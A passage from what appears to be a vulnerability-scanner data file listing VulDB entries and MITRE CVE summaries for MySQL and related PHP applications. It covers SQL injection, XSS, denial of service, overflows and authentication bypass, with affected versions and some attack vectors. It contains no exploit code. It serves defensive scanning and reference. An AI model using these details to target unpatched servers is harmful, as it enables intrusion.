18734| [45774] Constructr CMS up to 3.02.5 MySQL Database Cleartext information disclosure
18735| [45668] Nodstrum MySQL Calendar 1.1 index.php sql injection
18736| [45669] Nodstrum MySQL Calendar 1.1 unknown vulnerability
18737| [45016] Deeserver Panuwat PromoteWeb MySQL go.php sql injection
18738| [44358] MySQL up to 5.0.67 cross site scripting
18739| [44357] MySQL Quick Admin up to 1.5.5 index.php directory traversal
18740| [44356] MySQL Quick Admin 1.5.5 actions.php directory traversal
18741| [44131] NooMS 1.1 MySQL db.php information disclosure
18742| [44076] MySQL Create Table Symlink privilege escalation
18743| [44075] MySQL 5.0.51a Create Table Symlink privilege escalation
18744| [43987] MySQL Crash denial of service
18745| [43825] Aquagardensoft mysql-lists 1.2 cross site scripting
18746| [43819] Craftysyntax Crafty Syntax Live Help up to 1.7 MySQL Database Cleartext information disclosure
18747| [43625] Keld PHP-MySQL News Script 0.7.1 login.php sql injection
18748| [43123] BlognPlus 2.5.5 MySQL index.php sql injection
18749| [42939] Relative Real Estate Systems up to 3.0 MySQL Database Cleartext information disclosure
18750| [42912] AlstraSoft AskMe 2.1 MySQL Database Cleartext information disclosure
18751| [42868] BlognPlus 2.5.4 MySQL sql injection
18752| [42205] miniBB 2.2 MySQL setup_mysql.php sql injection
18753| [41891] Terong Advanced Web Photo Gallery 1.0 MySQL Database Cleartext information disclosure
18754| [40486] MySQL up to 1.7.5 handshake.cpp processoldclienthello memory corruption
18755| [40219] PHP MySQL Banner Exchange 2.2.1 inc/lib.inc unknown vulnerability
18756| [39993] MySQL denial of service
18757| [3499] Sun MySQL up to 6.0.3 System Table Information privilege escalation
18758| [40030] aurora framework 20071208 MySQL db_mysql.lib pack_var sql injection
18759| [3469] Sun MySQL 5.1.23 Bk InnoDB denial of service
18760| [39991] MySQL up to 6.0.4 denial of service
18761| [39292] Asterisk-Addons 1.2.7/1.4.3 MySQL sql injection
18762| [41090] MySQL Mysql Community Server up to 5.1.4 unknown vulnerability
18763| [38781] PHP 5.2.4 MySQL memory corruption
18764| [38618] PHP 4.4.7/5.2.3 mysqli sql injection
18765| [85747] InterWorx SiteWorx mysql.php cross site scripting
18766| [85735] InterWorx NodeWorx mysql.php cross site scripting
18767| [37818] MySQL Community Server up to 5.0.40 denial of service
18768| [39994] MySQL Federated Crash denial of service
18769| [37641] MySQLDumper htaccess privilege escalation
18770| [86077] NetClassifieds Mysql_db.php information disclosure
18771| [37816] MySQL Community Server up to 5.0.40 Crash denial of service
18772| [36814] MySQL up to 5.1.17 information disclosure
18773| [36669] MySQL 4.0.1 unknown vulnerability
18774| [36813] mysql up to 5.1.17 thd::db_access denial of service
18775| [36812] MySQL up to 5.1.17 unknown vulnerability
18776| [36502] Burnstone burnCMS 0.2 mysql.class.php privilege escalation
18777| [36364] GPL PHP Board unstable-2001.11.14-1 mysqli db.mysql.inc.php privilege escalation
18778| [36700] MySQL up to 5.0.39 item_cmpfunc.cc in_decimal::set denial of service
18779| [35917] Advanced Website Creator MySQL sql injection
18780| [35916] Eve-Nuke Forum 0.1 MySQL db/mysql.php privilege escalation
18781| [35605] bitesser MySQL Commander up to 2.7 ressourcen/dbopen.php privilege escalation
18782| [85480] Fantastico includes/mysqlconfig.php directory traversal
18783| [85141] ActiveCalendar data/mysqlevents.php cross site scripting
18784| [85212] WGS-PPC config/mysql_config.php privilege escalation
18785| [34894] MySQLNewsEngine MySQL affichearticles.php3 privilege escalation
18786| [34576] MyODBC MySQL Database denial of service
18787| [37817] MySQL Community Server up to 5.0.40 Create Table information disclosure
18788| [34117] The Address Book 1.04e MySQL Database export.php information disclosure
18789| [34223] MySQL 5.0.30/5.1.13 sql_select.cc denial of service
18790| [33690] Widcomm BTSaveMySql 1.2 MySQL information disclosure
18791| [33257] iWonder Designs Storystream 0.4.0.0 mysql.php sql injection
18792| [33092] Pentaho Business Intelligence Suite up to 1.1 MySQL sql injection
18793| [32736] MysqlDumper 1.21 B6 sql.php cross site scripting
18794|
18795| MITRE CVE - https://cve.mitre.org:
18796| [CVE-2013-3812] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
18797| [CVE-2013-3811] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3806.
18798| [CVE-2013-3810] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to XA Transactions.
18799| [CVE-2013-3809] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Audit Log.
18800| [CVE-2013-3808] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
18801| [CVE-2013-3807] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect confidentiality and integrity via unknown vectors related to Server Privileges.
18802| [CVE-2013-3806] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB, a different vulnerability than CVE-2013-3811.
18803| [CVE-2013-3805] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Prepared Statements.
18804| [CVE-2013-3804] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18805| [CVE-2013-3802] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Full Text Search.
18806| [CVE-2013-3801] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Options.
18807| [CVE-2013-3798] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote attackers to affect integrity and availability via unknown vectors related to MemCached.
18808| [CVE-2013-3796] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18809| [CVE-2013-3795] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
18810| [CVE-2013-3794] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.30 and earlier and 5.6.10 allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
18811| [CVE-2013-3793] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier and 5.6.11 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
18812| [CVE-2013-3783] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.31 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Parser.
18813| [CVE-2013-3561] Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remote attackers to cause a denial of service (loop or application crash) via a malformed packet, related to a crash of the Websocket dissector, an infinite loop in the MySQL dissector, and a large loop in the ETCH dissector.
18814| [CVE-2013-3221] The Active Record component in Ruby on Rails 2.3.x, 3.0.x, 3.1.x, and 3.2.x does not ensure that the declared data type of a database column is used during comparisons of input values to stored values in that column, which makes it easier for remote attackers to conduct data-type injection attacks against Ruby on Rails applications via a crafted value, as demonstrated by unintended interaction between the "typed XML" feature and a MySQL database.
18815| [CVE-2013-2395] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-1567.
18816| [CVE-2013-2392] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18817| [CVE-2013-2391] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows local users to affect confidentiality and integrity via unknown vectors related to Server Install.
18818| [CVE-2013-2389] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18819| [CVE-2013-2381] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server Privileges.
18820| [CVE-2013-2378] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
18821| [CVE-2013-2376] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
18822| [CVE-2013-2375] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
18823| [CVE-2013-1861] MariaDB 5.5.x before 5.5.30, 5.3.x before 5.3.13, 5.2.x before 5.2.15, and 5.1.x before 5.1.68, and Oracle MySQL 5.1.69 and earlier, 5.5.31 and earlier, and 5.6.11 and earlier allows remote attackers to cause a denial of service (crash) via a crafted geometry feature that specifies a large number of points, which is not properly handled when processing the binary representation of this feature, related to a numeric calculation error.
18824| [CVE-2013-1570] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote attackers to affect availability via unknown vectors related to MemCached.
18825| [CVE-2013-1567] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language, a different vulnerability than CVE-2013-2395.
18826| [CVE-2013-1566] Unspecified vulnerability in Oracle MySQL 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18827| [CVE-2013-1555] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, and 5.5.29 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
18828| [CVE-2013-1552] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
18829| [CVE-2013-1548] Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types.
18830| [CVE-2013-1544] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
18831| [CVE-2013-1532] Unspecified vulnerability in Oracle MySQL 5.1.68 and earlier, 5.5.30 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
18832| [CVE-2013-1531] Unspecified vulnerability in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Privileges.
18833| [CVE-2013-1526] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
18834| [CVE-2013-1523] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier and 5.6.10 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Optimizer.
18835| [CVE-2013-1521] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Server Locking.
18836| [CVE-2013-1512] Unspecified vulnerability in Oracle MySQL 5.5.29 and earlier allows remote authenticated users to affect availability via unknown vectors related to Data Manipulation Language.
18837| [CVE-2013-1511] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18838| [CVE-2013-1506] Unspecified vulnerability in Oracle MySQL 5.1.67 and earlier, 5.5.29 and earlier, and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Locking.
18839| [CVE-2013-1502] Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition.
18840| [CVE-2013-1492] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.30, has unspecified impact and attack vectors, a different vulnerability than CVE-2012-0553.
18841| [CVE-2013-0389] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18842| [CVE-2013-0386] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Stored Procedure.
18843| [CVE-2013-0385] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows local users to affect confidentiality and integrity via unknown vectors related to Server Replication.
18844| [CVE-2013-0384] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Information Schema.
18845| [CVE-2013-0383] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote attackers to affect availability via unknown vectors related to Server Locking.
18846| [CVE-2013-0375] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.1.28 and earlier, allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Server Replication.
18847| [CVE-2013-0371] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability, related to MyISAM.
18848| [CVE-2013-0368] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18849| [CVE-2013-0367] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Partition.
18850| [CVE-2012-5615] MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, 5.2.13, 5.1.66, and possibly other versions, generates different error messages with different time delays depending on whether a user name exists, which allows remote attackers to enumerate valid usernames.
18851| [CVE-2012-5614] Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (mysqld crash) via a SELECT command with an UpdateXML command containing XML with a large number of unique, nested elements.
18852| [CVE-2012-5613] ** DISPUTED ** MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
18853| [CVE-2012-5612] Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions through 5.5.28, and MariaDB 5.5.28a and possibly other versions, allows remote authenticated users to cause a denial of service (memory corruption and crash) and possibly execute arbitrary code, as demonstrated using certain variations of the (1) USE, (2) SHOW TABLES, (3) DESCRIBE, (4) SHOW FIELDS FROM, (5) SHOW COLUMNS FROM, (6) SHOW INDEX FROM, (7) CREATE TABLE, (8) DROP TABLE, (9) ALTER TABLE, (10) DELETE FROM, (11) UPDATE, and (12) SET PASSWORD commands.
18854| [CVE-2012-5611] Stack-based buffer overflow in the acl_get function in Oracle MySQL 5.5.19 and other versions through 5.5.28, and 5.1.53 and other versions through 5.1.66, and MariaDB 5.5.2.x before 5.5.28a, 5.3.x before 5.3.11, 5.2.x before 5.2.13 and 5.1.x before 5.1.66, allows remote authenticated users to execute arbitrary code via a long argument to the GRANT FILE command.
18855| [CVE-2012-5383] ** DISPUTED ** Untrusted search path vulnerability in the installation functionality in Oracle MySQL 5.5.28, when installed in the top-level C:\ directory, might allow local users to gain privileges via a Trojan horse DLL in the "C:\MySQL\MySQL Server 5.5\bin" directory, which may be added to the PATH system environment variable by an administrator, as demonstrated by a Trojan horse wlbsctrl.dll file used by the "IKE and AuthIP IPsec Keying Modules" system service in Windows Vista SP1, Windows Server 2008 SP2, Windows 7 SP1, and Windows 8 Release Preview. NOTE: CVE disputes this issue because the unsafe PATH is established only by a separate administrative action that is not a default part of the MySQL installation.
18856| [CVE-2012-5096] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors.
18857| [CVE-2012-5060] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.65 and earlier and 5.5.27 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
18858| [CVE-2012-4452] MySQL 5.0.88, and possibly other versions and platforms, allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of a CVE-2009-4030 regression, which was not omitted in other packages and versions such as MySQL 5.0.95 in Red Hat Enterprise Linux 6.
18859| [CVE-2012-4414] Multiple SQL injection vulnerabilities in the replication code in Oracle MySQL possibly before 5.5.29, and MariaDB 5.1.x through 5.1.62, 5.2.x through 5.2.12, 5.3.x through 5.3.7, and 5.5.x through 5.5.25, allow remote authenticated users to execute arbitrary SQL commands via vectors related to the binary log. NOTE: as of 20130116, Oracle has not commented on claims from a downstream vendor that the fix in MySQL 5.5.29 is incomplete.
18860| [CVE-2012-4255] MySQLDumper 1.24.4 allows remote attackers to obtain sensitive information via a direct request to learn/cubemail/refresh_dblist.php, which reveals the installation path in an error message.
18861| [CVE-2012-4254] MySQLDumper 1.24.4 allows remote attackers to obtain sensitive information (Notices) via a direct request to (1) learn/cubemail/restore.php or (2) learn/cubemail/dump.php.
18862| [CVE-2012-4253] Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
18863| [CVE-2012-4252] Multiple cross-site request forgery (CSRF) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to hijack the authentication of administrators for requests that (1) remove file access restriction via a deletehtaccess action, (2) drop a database via a kill value in a db action, (3) uninstall the application via a 101 value in the phase parameter to learn/cubemail/install.php, (4) delete config.php via a 2 value in the phase parameter to learn/cubemail/install.php, (5) change a password via a schutz action, or (6) execute arbitrary SQL commands via the sql_statement parameter to learn/cubemail/sql.php.
18864| [CVE-2012-4251] Multiple cross-site scripting (XSS) vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to index.php, (2) phase parameter to install.php, (3) tablename or (4) dbid parameter to sql.php, or (5) filename parameter to restore.php in learn/cubemail/.
18865| [CVE-2012-3951] The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session.
18866| [CVE-2012-3441] The database creation script (module/idoutils/db/scripts/create_mysqldb.sh) in Icinga 1.7.1 grants access to all databases to the icinga user, which allows icinga users to access other databases via unspecified vectors.
18867| [CVE-2012-3197] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication.
18868| [CVE-2012-3180] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18869| [CVE-2012-3177] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server.
18870| [CVE-2012-3173] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB Plugin.
18871| [CVE-2012-3167] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Full Text Search.
18872| [CVE-2012-3166] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.63 and earlier, and 5.5.25 and earlier, allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18873| [CVE-2012-3163] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to Information Schema.
18874| [CVE-2012-3160] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation.
18875| [CVE-2012-3158] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Protocol.
18876| [CVE-2012-3156] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.25 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
18877| [CVE-2012-3150] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18878| [CVE-2012-3149] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect confidentiality, related to MySQL Client.
18879| [CVE-2012-3147] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote attackers to affect integrity and availability, related to MySQL Client.
18880| [CVE-2012-3144] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server.
18881| [CVE-2012-2750] Unspecified vulnerability in MySQL 5.5.x before 5.5.23 has unknown impact and attack vectors related to a "Security Fix", aka Bug #59533. NOTE: this might be a duplicate of CVE-2012-1689, but as of 20120816, Oracle has not commented on this possibility.
18882| [CVE-2012-2749] MySQL 5.1.x before 5.1.63 and 5.5.x before 5.5.24 allows remote authenticated users to cause a denial of service (mysqld crash) via vectors related to incorrect calculation and a sort order index.
18883| [CVE-2012-2122] sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.
18884| [CVE-2012-2102] MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
18885| [CVE-2012-1757] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18886| [CVE-2012-1756] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors.
18887| [CVE-2012-1735] Unspecified vulnerability in Oracle MySQL Server 5.5.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18888| [CVE-2012-1734] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.23 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18889| [CVE-2012-1705] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18890| [CVE-2012-1703] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18891| [CVE-2012-1702] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote attackers to affect availability via unknown vectors.
18892| [CVE-2012-1697] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.21 and earlier allows remote authenticated users to affect availability via unknown vectors related to Partition.
18893| [CVE-2012-1696] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.19 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18894| [CVE-2012-1690] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18895| [CVE-2012-1689] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier, and 5.5.22 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18896| [CVE-2012-1688] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.61 and earlier, and 5.5.21 and earlier, allows remote authenticated users to affect availability, related to Server DML.
18897| [CVE-2012-0937] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier does not limit the number of MySQL queries sent to external MySQL database servers, which allows remote attackers to use WordPress as a proxy for brute-force attacks or denial of service attacks via the dbhost parameter, a different vulnerability than CVE-2011-4898. NOTE: the vendor disputes the significance of this issue because an incomplete WordPress installation might be present on the network for only a short time.
18898| [CVE-2012-0882] Buffer overflow in yaSSL, as used in MySQL 5.5.20 and possibly other versions including 5.5.x before 5.5.22 and 5.1.x before 5.1.62, allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VulnDisco Pack Professional 9.17. NOTE: as of 20120224, this disclosure has no actionable information. However, because the module author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes. NOTE: due to lack of details, it is not clear whether this issue is a duplicate of CVE-2012-0492 or another CVE.
18899| [CVE-2012-0583] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.60 and earlier, and 5.5.19 and earlier, allows remote authenticated users to affect availability, related to MyISAM.
18900| [CVE-2012-0578] Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Optimizer.
18901| [CVE-2012-0574] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier, and 5.5.28 and earlier, allows remote authenticated users to affect availability via unknown vectors.
18902| [CVE-2012-0572] Unspecified vulnerability in the Server component in Oracle MySQL 5.1.66 and earlier and 5.5.28 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB.
18903| [CVE-2012-0553] Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and 5.5.x before 5.5.28, has unspecified impact and attack vectors, a different vulnerability than CVE-2013-1492.
18904| [CVE-2012-0540] Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier and 5.5.23 and earlier allows remote authenticated users to affect availability, related to GIS Extension.
18905| [CVE-2012-0496] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
18906| [CVE-2012-0495] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0493.
18907| [CVE-2012-0494] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows local users to affect availability via unknown vectors.
18908| [CVE-2012-0493] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, and CVE-2012-0495.
18909| [CVE-2012-0492] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0485.
18910| [CVE-2012-0491] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0493, and CVE-2012-0495.
18911| [CVE-2012-0490] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect availability via unknown vectors.
18912| [CVE-2012-0489] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
18913| [CVE-2012-0488] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0487, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
